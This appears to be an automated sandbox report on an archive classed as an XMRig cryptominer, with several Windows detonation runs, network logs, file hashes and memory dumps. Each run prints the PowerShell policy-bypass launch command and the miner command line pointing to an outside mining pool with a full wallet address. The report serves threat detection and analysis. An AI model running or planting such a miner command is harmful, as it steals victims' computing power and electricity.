Malware Analysis Report

2025-04-19 18:41

Sample ID 240526-qtzx2shb26
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags xmrig execution miner
Score 10/10

Analysis Overview

Score 10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

xmrig

XMRig Miner payload

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-26 13:33

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:21

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1761s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.11:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_adka1anw.l5o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:54

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1773s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f2zc2zds.i3d.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:21

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zzgurow4.ba2.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:38

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gjmailoj.qmq.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4740-25-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/4740-48-0x000001A6F2DE0000-0x000001A6F2DF2000-memory.dmp

memory/4740-61-0x000001A6F2B80000-0x000001A6F2B8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:40

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2492-0-0x00007FFC1B913000-0x00007FFC1B915000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jvguqk30.key.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:51

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp

Files

memory/4564-0-0x00007FF9F0CD3000-0x00007FF9F0CD5000-memory.dmp

memory/4564-6-0x00000256C4690000-0x00000256C46B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zn4zooe1.1hf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:54

Platform

win10-20240404-en

Max time kernel

1794s

Max time network

1754s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wyn4ouob.nrd.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1640-91-0x000001D048060000-0x000001D048080000-memory.dmp

memory/1640-93-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/2668-94-0x00007FF9338A0000-0x00007FF93428C000-memory.dmp

memory/2668-97-0x00007FF9338A3000-0x00007FF9338A4000-memory.dmp

memory/1640-96-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/2668-98-0x00007FF9338A0000-0x00007FF93428C000-memory.dmp

memory/2668-99-0x00007FF9338A0000-0x00007FF93428C000-memory.dmp

memory/1640-101-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-103-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-105-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-107-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-109-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-111-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-113-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-115-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-117-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-119-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-121-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-123-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-125-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-127-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-129-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-131-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-133-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-135-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-137-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

memory/1640-139-0x00007FF6579D0000-0x00007FF658603000-memory.dmp

